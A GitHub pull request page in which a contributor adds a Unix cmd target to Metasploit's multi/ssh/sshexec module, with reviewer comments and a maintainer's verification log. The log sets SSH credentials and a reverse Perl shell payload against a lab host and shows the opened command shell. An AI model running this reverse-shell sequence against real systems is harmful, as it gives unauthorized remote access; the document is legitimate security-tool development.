New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update sshexec to allow unix cmd for testing and other targets not supported #10917

Merged
merged 1 commit into from Nov 7, 2018

Conversation

Projects
None yet
4 participants
@aringo
Contributor

aringo commented Nov 4, 2018

Set target to unix cmd,, add options for ssh sessions, select a payload and go.

I used this modified version many times to get a quick session on OpenBSD which was not supported by the default targets.

@aringo aringo changed the title from Modified sshexec to allow unix cmd for testing and other targets not supported to Update sshexec to allow unix cmd for testing and other targets not supported Nov 4, 2018

Show resolved Hide resolved modules/exploits/multi/ssh/sshexec.rb Outdated
Show resolved Hide resolved modules/exploits/multi/ssh/sshexec.rb Outdated
@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 5, 2018

I used this modified version many times to get a quick session on OpenBSD which was not supported by the default targets.

I'm not sure why unix/cmd was never added as a target.

Metasploit has BSD payloads. Perhaps it would make sense to also add a target for BSD.

@wvu-r7 wvu-r7 requested a review from zeroSteiner Nov 5, 2018

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Nov 5, 2018

Great change. Thank you.

@zeroSteiner

I agree with all of the comments from the other reviewers and have nothing to add. The changes make sense to me.

modified to allow unix cmd for testing and other targets not supporte…
…d, took out interpolation,notes section re-added

added notes section back in
@aringo

I think this addressed everything in the comments.

@bcoles

bcoles approved these changes Nov 7, 2018

String interpolation has been removed

@bcoles bcoles self-assigned this Nov 7, 2018

@bcoles bcoles merged commit 9dd0f2a into rapid7:master Nov 7, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bcoles added a commit that referenced this pull request Nov 7, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 7, 2018

Landing

msf5 exploit(multi/ssh/sshexec) > set username user
username => user
msf5 exploit(multi/ssh/sshexec) > set password myhovercraftisfullofeels
password => myhovercraftisfullofeels
msf5 exploit(multi/ssh/sshexec) > set target 9
target => 9
msf5 exploit(multi/ssh/sshexec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(multi/ssh/sshexec) > set lhost 172.16.123.188
lhost => 172.16.123.188
msf5 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 172.16.123.188:4444 
[*] 172.16.123.141:22 - Sending stager...
[*] Command shell session 1 opened (172.16.123.188:4444 -> 172.16.123.141:36400) at 2018-11-07 01:21:41 -0500

id
uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 172.16.123.141 - Command shell session 1 closed.  Reason: User exit

msjenkins-r7 added a commit that referenced this pull request Nov 7, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 7, 2018

Release Notes

This PR adds a Unix Cmd target to the multi/ssh/sshexec module to support cmd/unix payloads.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment